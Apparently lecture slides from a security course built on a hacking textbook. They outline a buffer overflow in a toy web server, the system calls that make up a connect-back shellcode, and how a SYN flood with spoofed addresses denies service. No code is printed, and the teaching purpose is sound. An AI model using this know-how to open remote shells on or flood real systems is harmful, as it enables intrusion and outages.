Slide 26: Tinyweb example
Source: booksrc/tinyweb.c. The source of the vulnerability is the recv_line function in booksrc/hacking-network.h: it does not check the length of the incoming line, so an overlong request line overflows the buffer it is read into.

Slide 27: Using tinyweb to create a connect-back shell
The shellcode (booksrc/connectback_shell.s, connect_back_shellcode_execute.pdf) consists of:
- socket-related system calls: socket(), connect()
- file descriptor redirection: dup2()
- shell execution

Slide 28: Attack network design example: SYN flooding
The attack sends many TCP SYN packets with spoofed source addresses to open connections. The target answers each with a SYN-ACK and keeps the half-open connection waiting for a final ACK that never arrives; the connection table and its resources are used up, and legitimate clients are denied service (DoS). How the SYN flood is done: booksrc/synflood.c.
